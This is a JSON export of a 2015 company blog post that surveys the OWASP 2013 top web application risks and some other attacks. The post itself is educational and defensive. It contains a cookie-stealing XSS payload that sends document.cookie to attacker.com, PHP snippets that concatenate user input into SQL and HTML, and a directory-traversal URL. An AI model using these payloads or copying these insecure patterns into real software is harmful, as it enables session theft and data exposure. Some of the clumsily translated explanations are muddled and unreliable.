{"id":6994,"date":"2015-07-22T14:45:42","date_gmt":"2015-07-22T12:45:42","guid":{"rendered":"https:\/\/anexia.com\/stagingblog\/?p=6994"},"modified":"2022-04-22T11:16:32","modified_gmt":"2022-04-22T09:16:32","slug":"security-of-web-applications","status":"publish","type":"post","link":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/","title":{"rendered":"Security of web applications"},"content":{"rendered":"<p>Browser and the Internet are ubiquitous in today&#8217;s world &#8211; whether on a PC or on a smartphone. But since a long time they&#8217;re no longer just for the reputation of websites.<!--more--><\/p>\n<p>Through modern strategies and a very active development in recent years, the browsers, and even the Internet itself have changed considerably. So currently there is a trend to convert more and more software solutions from the desktop area in full qualified web applications. The arguments for this are far-reaching &#8211; from simple decentralized provision through to the complete independence of platforms and locations, so that the software is fully functional on virtually any device at any time.<\/p>\n<p>Nevertheless, this trend implies a potential threat &#8211; since now the software as well as all the data is stored centrally, the safety aspect acquires now a new level. SQL injection, cross-site scripting or session hijacking are common terms. But what this means and what consequences may result from this, I would like to explain in the following.<\/p>\n<p>The non-profit organization &#8222;<a title=\"OWASP\" href=\"https:\/\/www.owasp.org\/\" target=\"_blank\" rel=\"noopener\">OWASP<\/a>&#8220; (Open Web Application Security Project) has set itself the goal to improve the security of applications and services on the Internet. They want security, shall, subject to those involved, the processes and the dimensions of the technology. To this end, they&#8217;re regularly publishing statistics on the most common vulnerabilities. The currently most recent dates back to 2013.<\/p>\n<p><a href=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-889 size-full\" src=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit.jpg\" alt=\"ANEXIA_Blogbild_Sicherheit\" width=\"600\" height=\"225\" srcset=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit.jpg 600w, https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit-325x122.jpg 325w, https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/07\/ANEXIA_Blogbild_Sicherheit-300x113.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<h2>Frequent risks (by OWASP 2013)<\/h2>\n<h3>1. Injection<\/h3>\n<p>Injection refers to the attack, in which attempts by injecting arbitrary program code in the application, to paralyze them. This could be done for example through the URL. If this data is not validated on the server side, and so, for example, are transferred directly into a SQL query, there are all doors opened  for potential attackers.<\/p>\n<pre class=\"lang:php decode:true\">$sql = \"SELECT * FROM users WHERE id = '\" . $_GET['id'] . \"'\";<\/pre>\n<p>&nbsp;<\/p>\n<h3>2. Broken Authentication and Session Management<\/h3>\n<p>This refers to the improper use of sensitive data for the purpose of user authentication. A session is defined as the active connection of a client to a server, started and stopped by the &#8222;Login&#8220; and &#8222;Logout&#8220;. In order for the server to be able to identify the individual interactions with the many parallel users definitely it uses in each case an unique identifier, the so called &#8222;session ID&#8220;. For safety reasons, this should always be kept secret, and even the software itself be known internally.<\/p>\n<p>Here it would be possible, for example, that this (secret) session ID is passed as a parameter to the URL. However if a third person finds out this (eg by sniffing of network traffic), it can navigate these with the profile of the logged-in person, but without ever having known their credentials.<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/sale\/payment?sessionId=123456789&amp;action=view<\/pre>\n<p>&nbsp;<\/p>\n<h3>3. Cross-Site-Scripting (XSS)<\/h3>\n<p>Under this designation, two fundamentally different attacks can be meant.<\/p>\n<p>At client-side XSS the attacker tries to inject a website with HTML code (or from another client-side scripting language such as Javascript), which is then executed in the browser of the victim. So it could be possible to initiate a &#8222;cross-site request forgery&#8220; subsequently.<\/p>\n<p>A server-side XSS is basically the same, however, is here instead of the browser, the web server the aim of the attack. For example, within the software, an additional file is loaded dynamically, this vulnerability could be specifically exploited to execute an unintended one or even one from another server.<\/p>\n<pre class=\"lang:php decode:true \">$str = '&lt;input tpe=\"text\" name=\"creditcard\" value=\"' . $_GET['creditcard_number'] . '\" \/&gt;';\r\necho $str;\r\n<\/pre>\n<div dir=\"ltr\"><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"hps\">The attacker could<\/span> <span class=\"hps\">so<\/span> <span class=\"hps\">easily<\/span> <span class=\"hps\">perform<\/span>, for example, <span class=\"hps\">the following sample<\/span> <span class=\"hps\">manipulation<\/span> <span class=\"hps\">via javascript<\/span>:<\/span><\/div>\n<pre class=\"lang:js decode:true\">\"&gt;&lt;script&gt;document.location= 'http:\/\/www.attacker.com\/cgi-bin\/cookie.cgi?foo=' + document.cookie&lt;\/script&gt;\"<\/pre>\n<p>Thus, the browser is constrained then to transmit the session ID to the attacker, and thus to gain unauthorized access to the application (see. Point 2).<\/p>\n<p>&nbsp;<\/p>\n<h3>4. Insecure Direct Object References<\/h3>\n<p>Uncertain object references are defined as the most unwanted disclosure of systemic or user-related data. Mostly this type of attack is used to spy on user data &#8211; caused by the non-authenticated execution e.g. of SQL queries with the subsequently direct delivery of the result.<\/p>\n<pre class=\"lang:java decode:true \">String sql = \"SELECT * FROM accounts WHERE account = ?\";\r\nPreparedStatement pstmt = connection.prepareStatement(sql, ...);\r\npstmt.setString(1, request.getParameter(\"account\"));\r\nResultSet results = pstmt.executeQuery();<\/pre>\n<p><span id=\"result_box\" class=\"short_text\" lang=\"en\"><span class=\"hps\">The<\/span> <span class=\"hps\">request<\/span> <span class=\"hps\">could<\/span> <span class=\"hps\">look like this<\/span><span class=\"\">:<\/span><\/span><\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/account\/info?account=not_my_account<\/pre>\n<p>In this example, an attacker could easily find out whether a specific user account exists or not.<\/p>\n<p>&nbsp;<\/p>\n<h3>5. Security Misconfiguration<\/h3>\n<p>Security updates in the form of patches are provided for server software as well as the components used mostly. But unfortunately they are all too often ignored &#8211; in most cases by the fear of compromising the function of an already working system.<\/p>\n<p>But unnecessarily running services and open ports can pose a risk.<\/p>\n<p>&nbsp;<\/p>\n<h3>6. Sensitive Data Exposure<\/h3>\n<p>This point deals with the handling of sensitive data and their secure processing. So a simple encryption based on standard encoding and decoding capabilities is usually not enough, because you can decipher the seemingly &#8222;safe&#8220; content again just with a few tricks.<\/p>\n<p>So here, for example, the use of public and private keys is of enormous importance. If an attacker gets rid of the sensitive data, it is now only half as bad, as long as the key pair with which the data was encrypted, remains secret. The longer these key pairs are, and they also contain multiple special characters, the harder it is to crack this.<\/p>\n<p>&nbsp;<\/p>\n<h3>7. Missing Function Level Access Control<\/h3>\n<p>For systems with different access rights, it suffices by no means that protected areas are simply be hidden. In most cases it is sufficient just to know the appropriate URL or parameters.<\/p>\n<p>Therefore, it is even more important on the server side to check the user interactions again in order to largely exclude unauthorized access to. However, these checks have to be independent of the information supplied by the user.<\/p>\n<p>Multistage independent validations here are always recommended. For example, it&#8217;s not enough only to check whether a user is logged in, and then functions simply hide &#8211; it must be taken in any case with regard to the user role, and so those areas for which there has no authorization, completely foreclose.<\/p>\n<p>&nbsp;<\/p>\n<h3>8. Cross-Site-Request-Forgery (CSRF)<\/h3>\n<p>For CSRF an existing session between the server and user is required. The attacker tries here to force actively the unsuspecting user to open by XSS manipulated URLs.<\/p>\n<p>In contrast to session hijacking (detailed explanation below) the session ID doesn&#8217;t matter for the attacker.<\/p>\n<p>&nbsp;<\/p>\n<h3>9. Using components with known vulnerabilities<\/h3>\n<p>Theoretically it&#8217;s easy to figure out whether to use the  latest version of a component, or one with known weaknesses or vulnerabilities.<\/p>\n<p>But in practice, this is very different &#8211; because many manufacturers and developers sometimes not use comprehensible version numbers, this can unfortunately be a real challenge.<\/p>\n<p>It is useful to check regularly for updates and possibly also subscribe the newsletters or announcements of the manufacturers.<\/p>\n<p>&nbsp;<\/p>\n<h3>10. Unvalidated redirects and forwards<\/h3>\n<p>This potential vulnerability occurs when continuing or forwarding destinations are passed directly through the URL. To ensure security, these passed URLs should be validated on the server side again before the real forwarding is practiced. Better and more effective is however to pass only IDs or equivalent keys, which are stored for example in a database with the relevant destination URLs behind.<\/p>\n<pre class=\"lang:default decode:true\">http:\/\/example.com\/goto.php?url=danger.com<\/pre>\n<p>&nbsp;<\/p>\n<h2>Other risks<\/h2>\n<p>Of course, there are other risks and opportunities for attacks too. Just because they are not listed in the latest OWASP statistic, this nevertheless should not be underestimated!<\/p>\n<p>&nbsp;<\/p>\n<h3>Session Hijacking<\/h3>\n<p>Since the HTTP protocol is stateless, the application needs to realize the identification of a user itself. This is done by using the session ID.<\/p>\n<p>At session hijacking, the attacker tries with a &#8222;stolen&#8220; session ID to fake the identity of a foreign user, and thus to act in its name within the application.<\/p>\n<p>&nbsp;<\/p>\n<h3>Directory Traversal<\/h3>\n<p>In this method, the attacker tries with manipulated paths to resources to get to systemically important data.<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/download.php?file=stuff.zip<\/pre>\n<p>If there&#8217;s no more further validation, you could download in the following example instead of the nondescript ZIP folder all configuration files.<\/p>\n<pre class=\"lang:default decode:true \">http:\/\/example.com\/download.php?file=..\/..\/..\/config.php<\/pre>\n<p>&nbsp;<\/p>\n<h3>Email injection<\/h3>\n<p>This problem usually occurs when there are contact forms inside a website. The attacker attempts in this case to inject malicious code (see. XSS), so the message will not only be sent to the operator of the site, but also to a variety of any people.<\/p>\n<p>This threat is known as &#8222;spam&#8220;.<\/p>\n<p>&nbsp;<\/p>\n<h3>Man-In-The-Middle attack<\/h3>\n<p>As the name already implies, the attacker is directly inside the user&#8217;s network. He directs compounds which actually should affect the target server, over his own computer.<\/p>\n<p>Because now all the network traffic goes through the attackers&#8216; computer, he can easily sniff or manipulate the data.<\/p>\n<p>The only protection provides the use of encrypted connections via SSL. But if it should be possible for the attacker to get to this certificate, this measure is futile.<\/p>\n<p>&nbsp;<\/p>\n<h3>Denial of Service (DoS)<\/h3>\n<p>In a DoS attack, the attacker tries to claim by a plurality of parallel queries the server until this load can no longer withstand.<\/p>\n<p>An increase here represents the distributed DoS (DDoS), in which the requests are not from a single computer, but with hundreds or thousands parallel requests.<\/p>\n<p>&nbsp;<\/p>\n<h3>Phishing<\/h3>\n<p>Phishing does not count directly to the problems of a web application. Instead, an attacker tries to attract the attention of the victim by sending e.g. mass mailings with links to call the entry form or confirmation of PINs or TANs.<\/p>\n<p>If the victim then clicks on this link,it will not be redirected to the supposedly original website, but a visual equivalent of the attacker.<\/p>\n<p>Mostly this occurs in relation to online banking. It is therefore very important to check the domain and (if any) the SSL certificate (indicated by HTTPS).<\/p>\n<p>Legitimate businesses will never ask you for such information &#8211; and certainly not via e-mail!<\/p>\n<p>&nbsp;<\/p>\n<h2>Conclusion<\/h2>\n<p>The range of attack methods is vast &#8211; the more important it is to pay attention to such weaknesses already during the development phase, in order to avoid problems later.<\/p>\n<p>Attackers are constantly working to bypass security checks, in order to obtain sensitive data and resultantly causing an enormous (financial) damage.<\/p>\n<p>Unfortunately, it is so that software will never be 100 percent secure &#8211; you can only increase the safety standards accordingly in order to make it more difficult for attackers.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.<\/p>\n","protected":false},"author":15,"featured_media":515,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1135],"tags":[2049,2051,2053,2055,2057,2059,1329,2061,1379,2063,1484,1327,2065,2067],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Security of web applications - ANEXIA Blog<\/title>\n<meta name=\"description\" content=\"Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Security of web applications - ANEXIA Blog\" \/>\n<meta property=\"og:description\" content=\"Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/\" \/>\n<meta property=\"og:site_name\" content=\"ANEXIA Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/anexiagmbh\/\" \/>\n<meta property=\"article:published_time\" content=\"2015-07-22T12:45:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-22T09:16:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"1067\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Manuel Wutte\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@_ANEXIA\" \/>\n<meta name=\"twitter:site\" content=\"@_ANEXIA\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Manuel Wutte\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"9\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/\",\"url\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/\",\"name\":\"Security of web applications - ANEXIA Blog\",\"isPartOf\":{\"@id\":\"https:\/\/anexia.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\",\"datePublished\":\"2015-07-22T12:45:42+00:00\",\"dateModified\":\"2022-04-22T09:16:32+00:00\",\"author\":{\"@id\":\"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de\"},\"description\":\"Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.\",\"breadcrumb\":{\"@id\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#primaryimage\",\"url\":\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\",\"contentUrl\":\"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg\",\"width\":1600,\"height\":1067},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/anexia.com\/blog\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Security of web applications\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/anexia.com\/blog\/#website\",\"url\":\"https:\/\/anexia.com\/blog\/\",\"name\":\"ANEXIA Blog\",\"description\":\"[:de] ANEXIA Blog - Technischen Themen, Anexia News und Insights [:]\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/anexia.com\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de\",\"name\":\"Manuel Wutte\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/anexia.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g\",\"caption\":\"Manuel Wutte\"},\"url\":\"https:\/\/anexia.com\/blog\/author\/mwu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Security of web applications - ANEXIA Blog","description":"Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/","og_locale":"de_DE","og_type":"article","og_title":"Security of web applications - ANEXIA Blog","og_description":"Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.","og_url":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/","og_site_name":"ANEXIA Blog","article_publisher":"https:\/\/www.facebook.com\/anexiagmbh\/","article_published_time":"2015-07-22T12:45:42+00:00","article_modified_time":"2022-04-22T09:16:32+00:00","og_image":[{"width":1600,"height":1067,"url":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","type":"image\/jpeg"}],"author":"Manuel Wutte","twitter_card":"summary_large_image","twitter_creator":"@_ANEXIA","twitter_site":"@_ANEXIA","twitter_misc":{"Verfasst von":"Manuel Wutte","Gesch\u00e4tzte Lesezeit":"9\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/","url":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/","name":"Security of web applications - ANEXIA Blog","isPartOf":{"@id":"https:\/\/anexia.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#primaryimage"},"image":{"@id":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#primaryimage"},"thumbnailUrl":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","datePublished":"2015-07-22T12:45:42+00:00","dateModified":"2022-04-22T09:16:32+00:00","author":{"@id":"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de"},"description":"Web applications imply a potential threat . What this means and what consequences may result from this, I would like to explain in the following.","breadcrumb":{"@id":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#primaryimage","url":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","contentUrl":"https:\/\/anexia.com\/blog\/wp-content\/uploads\/2015\/01\/Manuel-Wutte_anexia-blau_web.jpg","width":1600,"height":1067},{"@type":"BreadcrumbList","@id":"https:\/\/anexia.com\/blog\/en\/security-of-web-applications\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/anexia.com\/blog\/de\/"},{"@type":"ListItem","position":2,"name":"Security of web applications"}]},{"@type":"WebSite","@id":"https:\/\/anexia.com\/blog\/#website","url":"https:\/\/anexia.com\/blog\/","name":"ANEXIA Blog","description":"[:de] ANEXIA Blog - Technischen Themen, Anexia News und Insights [:]","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/anexia.com\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/anexia.com\/blog\/#\/schema\/person\/926f6b9e5aeed88b145cf86d87fd09de","name":"Manuel Wutte","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/anexia.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9528a61f48f4294cd5f7cd8a4141bd55?s=96&d=mm&r=g","caption":"Manuel Wutte"},"url":"https:\/\/anexia.com\/blog\/author\/mwu\/"}]}},"lang":"en","translations":{"en":6994,"de":882},"amp_enabled":true,"pll_sync_post":[],"_links":{"self":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts\/6994"}],"collection":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/comments?post=6994"}],"version-history":[{"count":1,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts\/6994\/revisions"}],"predecessor-version":[{"id":6997,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/posts\/6994\/revisions\/6997"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/media\/515"}],"wp:attachment":[{"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/media?parent=6994"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/categories?post=6994"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/anexia.com\/blog\/wp-json\/wp\/v2\/tags?post=6994"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}